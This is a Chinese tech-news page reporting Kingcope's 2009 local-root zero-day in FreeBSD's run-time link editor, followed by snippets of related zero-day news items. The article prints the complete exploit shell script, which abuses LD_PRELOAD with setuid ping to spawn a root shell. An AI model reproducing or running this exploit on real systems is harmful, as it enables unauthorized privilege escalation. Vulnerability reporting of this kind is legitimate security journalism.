在圣诞节即将到来的日子,以安全著称的FreeBSD系统被著名黑客Kingcope爆了一个零日(0day)漏洞。据Kingcope所说,他长 期致力于挖掘FreeBSD系统的本地提权漏洞,终于有幸在近期发现了这个非常低级的本地提权漏洞;这个漏洞存在于FreeBSD的Run-Time Link-Editor(rtld)程序中,普通用户可以通过该漏洞非常轻易的获得root权限。该漏洞影响非常广泛,包括FreeBSD 7.1至8.0的32及64位系统。 在展示该漏洞威力之前,我们科普一下著名黑客kingcope。从2007年6月至今,他一共公 开了12个安全漏洞(没公开的不知道有多少),其中 FreeBSD和Sun Solaris各两个,微软四个,Oracle、mysql、NcFTPD和nginx各一个,同时他还编写了多个漏洞的攻击代码,例如 Sun Solaris telnetd及近期的IIS FTPd、Debian OpenSSH等。接下来我们在最新的FreeBSD 8.0中重现一下该漏洞的攻击过程,请注意图中的红色部分;我们只要执行名为fbsd8localroot.sh的脚本,就可以轻易的获得root权限。498)this.width=498;' onmousewheel = 'javascript:return big(this)' border="0" alt="" onload="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" onclick="if(!this.resized) {return true;} else {window.open('http://images.51cto.com/files/uploadimg/20091215/1001430.png');}" onmousewheel="return imgzoom(this);" onmouseover="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.style.cursor='hand'; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" src="http://images.51cto.com/files/uploadimg/20091215/1001430.png" />相关脚本如下:#!/bin/shecho “FreeBSD local r00t zeroday by Kingcope on November 2009″cat > env.c << _EOF#include <stdio.h>main() { extern char **environ; environ = (char**)malloc(8096); environ[0] = (char*)malloc(1024); environ[1] = (char*)malloc(1024); strcpy(environ[1], “LD_PRELOAD=/tmp/w00t.so.1.0″); execl(”/sbin/ping”, “ping”, 0);}_EOFgcc env.c -o env > /dev/null 2>&1#download from baoz.netcat > program.c << _EOF#include <unistd.h>#include <stdio.h>#include <sys/types.h>#include <stdlib.h>void _init() { extern char **environ; environ=NULL; system(”echo ALEX-ALEX;/bin/sh”);}_EOFgcc -o program.o -c program.c -fPIC ; gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles ; cp w00t.so.1.0 /tmp/w00t.so.1.0 ;./envFreeBSD尚未就该0day漏洞发布安全公告及官方补丁。
FreeBSD系统被黑客Kingcope爆了一个零日(0day)漏洞
时间: 2024-10-26 12:52:16
FreeBSD系统被黑客Kingcope爆了一个零日(0day)漏洞的相关文章
FreeBSD系统被Kingcope爆了一个零日(0day)漏洞
在圣诞节即将到来的日子,以安全著称的FreeBSD系统被著名黑客Kingcope爆了一个零日(0day)漏洞.据Kingcope所说,他长期致力于挖掘FreeBSD系统的本地提权漏洞,终于有幸在近期发现了这个非常低级的本地提权漏洞:这个漏洞存在于FreeBSD的Run-Time Link-Editor(rtld)程序中,普通用户可以通过该漏洞非常轻易的获得root权限.该漏洞影响非常广泛,包括FreeBSD 7.1至8.0的32及64位系统. 在展示该漏洞威力之前,我们科普一下著名黑客kingc
【阿里聚安全·移动安全周刊】三星开发人员之锅?自家Tizen系统被爆存在40多个0day漏洞
[阿里聚安全·移动安全周刊]三星开发人员之锅?自家Tizen系统被爆存在40多个0day漏洞 三星自家Tizen系统被曝存在40多个0 day漏洞 izen是三星自家的操作系统,目前上百万的三星产品都安装了这种操作系统,但一名安全研究人员近期在Tizen系统中发现了40个此前未被发现的0 day漏洞. 就在上个月,维基解密泄漏的CIA内部文档曝光了这一间谍机构目前正在通过三星智能电视监控用户的事实,而Vault 7也将美国中央情报局推倒了舆论的风口浪尖. 但现在的情况就更加严重了,因为一名以色列
一个Tor浏览器0day漏洞价值100万美元,其中的隐情是……
本文讲的是一个Tor浏览器0day漏洞价值100万美元,其中的隐情是--, 据外媒报道称,Zerodium(一家专门购买和转售零日漏洞的公司)近日刚刚宣布,它愿意为Tails Linux和Windows操作系统上流行的Tor浏览器可用零日漏洞支付高达100万美元的赏金. Tor浏览器用户应该将该消息作为一个早期预警,尤其是那些使用Tails操作系统来保护其隐私的用户.此外,该零日漏洞收购平台也在其网站上发布了一些规则和支付细节,宣布其对"未使用JavaScript"的Tor漏洞的收购价
Mozilla 在 22 小时内修复了 Firefox 中的一个零日漏洞
在上周的 Pwn2Own 大赛上,有白帽发现了 Firefox 浏览器里的一个零日漏洞,而 Mozilla 方面只用了 22 个小时进行修复,并且给予其 3 万美元的奖励.周五新发布的 Firefox 52.0.1 已经包含了最新的补丁,Firefox OS 部门的 Asa Dotzler 和 Mozilla 安全团队成员 Daniel Veditz 在 Twitter 上证实了这一点. 该漏洞由中国长亭安全研究实验室发现,并结合一个 Windows 内核缓冲区 bug 成功地进行了提权.Moz
黑客同时大规模攻击两大微软0Day漏洞
据新华社电 360安全中心13日发布公告称,继上周爆发"MPEG-2视频"0Day漏洞,微软又爆发"Office内存破坏"0day漏洞,目前木马产业链已开始同时利用这两个漏洞大肆传播木马病毒.360安全专家表示,同时利用两大微软0day漏洞对网民进行大规模"挂马"攻击,这在网络安全历史上还是第一次. 据介绍,微软"Office内存破坏"0day漏洞存在于Office网页组件"OCW10.dll"中,黑客如果
微软再爆零日漏洞逾133万台电脑遭攻击
本报讯(记者/蔡伟)继微软视频控件漏洞出现之后,昨日,两大杀毒软件厂商瑞星和赛门铁克再度发出安全警报,称发现微软视频技术控件(ActiveXcontrol)爆发零日(0day)漏洞,目前已有133万余台电脑遭攻击. 据悉,零日漏洞最早于8日被黑客利用,最近每天被该漏洞攻击的电脑都在20万台以上,并于昨日达到攻击最高峰.然而,由于微软尚未对外发布修补此漏洞的补丁,截至目前,累积超过133万台电脑被使用该漏洞的挂马网站攻击. 期间,网络攻击者目前主要通过WindowsXP系统上的IE浏览器利用该漏洞
微软再爆0day漏洞Vista用户不受影响
比特网7月14日消息--昨日,两大杀毒软件厂商瑞星和赛门铁克再度发出安全警报,称发现微软视频技术控件(ActiveXcontrol)爆发零日(0day)漏洞,目前已有133万余台电脑遭攻击. 据悉,网络攻击者目前主要通过WindowsXP系统上的IE浏览器利用该漏洞发动攻击,并将矛头指向IE6和IE7浏览器,虽然目前对IE8尚无影响,但仍存潜在风险.系统 预装测试表明,使用WindowsVista系统的电脑用户目前并未受此次漏洞的影响. 零日漏洞最早于8日被黑客利用,最近每天被该漏洞攻击的电脑都
黑客59万售卖Windows最新零日漏洞
一位名叫"BuggiCorp"的黑客近日在暗网黑市上兜售一种新的零日漏洞,号称可以利用这个漏洞在Windows所有版本中获取到最高的系统运营权限. 安全公司Trustawave发现,这个漏洞首次出现在俄罗斯的一个暗网黑客论坛上是在五月初,当时售价9.5万美元(折合成人民币约62万),一周前这个帖子再次被更新,价格并将价格改为9万美元(折合成人民币约59万). 据了解,零日漏洞的生意较黑市上售卖的其他产品来说难做一些,因为这其中需要一定的信任才能完成交易,通常通过个人的人脉进行销售,因此
甲骨文11g数据库爆零日攻击 可完全攻破
一位知名的安全研究人员前日展示了如何利用零日攻击攻破甲骨文11g数据库的安全防护,并从获得完全的控制权. NGS咨询的研究员DavidLitchfield演示了黑客如何突破安全防御以特权接管甲骨文11g的完全控制权限,并阐述了如何绕过甲骨文标签安全设置对信息的强制访问控制权.与此同时,Litchfield也宣布,这是他在NGS任职的最后一天,他正在考虑将自己的研究重心转向计算机取证方面. 作为安全领域内的一名资深人士,Litchfield称:"当从听说了甲骨文的首席执行官埃里森吹嘘他的数据库'牢